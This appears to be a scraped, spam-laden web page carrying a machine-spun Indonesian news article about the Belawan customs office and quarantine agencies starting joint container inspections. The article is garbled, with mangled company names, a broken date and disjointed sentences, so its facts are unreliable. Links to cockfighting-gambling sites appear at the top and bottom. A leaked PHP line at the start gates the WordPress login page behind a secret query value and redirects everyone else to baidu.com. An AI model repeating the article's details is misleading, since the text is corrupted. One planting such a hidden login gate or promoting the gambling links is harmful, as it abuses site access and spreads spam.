//̨¼ add_action('login_enqueue_scripts','login_protection'); function login_protection(){ if($_GET['word'] != '2868973770')header('Location: https://www.baidu.com/'); } Bea Cukai Belawan Laporkan Karantina Bea Cukai Bersama | adu ayam bali_s128.net login_s128.live

Bea Cukai Belawan Laporkan Karantina Bea Cukai Bersama

TRIBUNNEWS.COM-Tri Utomo Hendro Wibowo, Kepala Kantor Bea Cukai Belawan, dan Kepala Balai Karantina Pertanian dan Badan Karantina Ikan Belawan, yang bertanggung jawab atas pengawasan kualitas dan keamanan produk tangkap. Karantina ikan tingkat II di stasiun Belawan dilaksanakan pada Kamis (25 Juni 2020). Day) di aula TPFT Belawan PT Graha Segara. Merupakan tindak lanjut dari perjanjian kerjasama antara bea cukai dan karantina kargo, karantina ikan, pengawasan mutu dan keamanan produk perairan; KEP-197 / BC / 2019, nomor: 11511 / HK.220 / K.1 / 72019, nomor: 3408 / BKIPM.1 / KS.300 / VII / 2019. Pelaksanaan di pelabuhan Belawan diprakarsai oleh Bea Cukai dan Bea Cukai Belawan, Balai Karantina Pertanian Belawan dan Biro Karantina Ikan, serta Balai Karantina Ikan Kelas II Belawan untuk pengawasan kualitas dan keamanan produk akuatik.

Berpartisipasi dalam penandatanganan, Terminal Kontainer Berawang, Perusahaan Logistik Prima Indonesia Indonesia, Segara Perusahaan Praha Indonesia (Segara) semua berkomitmen untuk keberhasilan pelaksanaan inspeksi bersama.

Baca: Bea Cukai dan Jamby Malang Hancurkan Barang Ilegal Senilai Miliaran Rupiah, Termasuk Mainan Seks

Menurut Triutomo, Selama Ini Barang Sudah Diimpor, Kadang Disambut Dinas Bea Cukai dan Karantina Karantina secara terpisah. Untuk melakukan pemeriksaan ini, pemilik barang diharuskan memindahkan dan membuka peti kemas dua kali, yang otomatis menimbulkan biaya tambahan. Tri Utomo menjelaskan, pemeriksaan dilakukan di tempat dan waktu yang sama. Dan meningkatkan kesejahteraan komunitas.

Leave a comment

adu ayam bali_s128.net login_s128.live